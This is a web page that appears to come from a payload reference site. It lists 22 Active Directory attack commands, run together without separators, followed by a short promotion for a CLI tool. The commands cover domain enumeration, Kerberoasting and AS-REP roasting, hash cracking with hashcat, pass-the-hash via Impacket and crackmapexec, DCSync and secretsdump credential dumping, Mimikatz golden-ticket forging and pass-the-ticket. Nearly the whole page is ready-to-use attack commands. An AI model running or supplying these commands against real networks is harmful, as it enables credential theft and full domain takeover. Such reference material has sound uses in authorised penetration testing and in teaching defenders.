$loading...
Active Directory enumeration, Kerberoasting, AS-REP roasting, Pass-the-Hash, DCSync, Golden Ticket, and lateral movement techniques. (22 payloads)
net user /domainnet group "Domain Admins" /domainnltest /dclist:<domain>Get-ADUser -Filter * -Properties * | Select Name,SamAccountName,EnabledGet-ADGroupMember "Domain Admins" | Select Name,SamAccountNameldapsearch -H ldap://<DC_IP> -x -b "dc=domain,dc=com" "(objectClass=user)" sAMAccountNamebloodhound-python -u user -p pass -d domain.com -c All --zippython3 GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP> -requestRubeus.exe kerberoast /outfile:hashes.txthashcat -m 13100 -a 0 hashes.txt rockyou.txtpython3 GetNPUsers.py domain.com/ -dc-ip <DC_IP> -usersfile users.txt -no-passRubeus.exe asreproast /outfile:asrep_hashes.txthashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txtpython3 psexec.py -hashes :NTLM_HASH domain/user@targetcrackmapexec smb target -u user -H NTLM_HASHpython3 wmiexec.py -hashes :NTLM_HASH domain/user@targetpython3 secretsdump.py domain/user:pass@<DC_IP>mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgtmimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:<SID> /krbtgt:<NTLM> /pttmimikatz # kerberos::ptt ticket.kirbiRubeus.exe ptt /ticket:<base64_ticket>python3 getST.py -spn cifs/<target> -impersonate Administrator domain.com/user:passLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides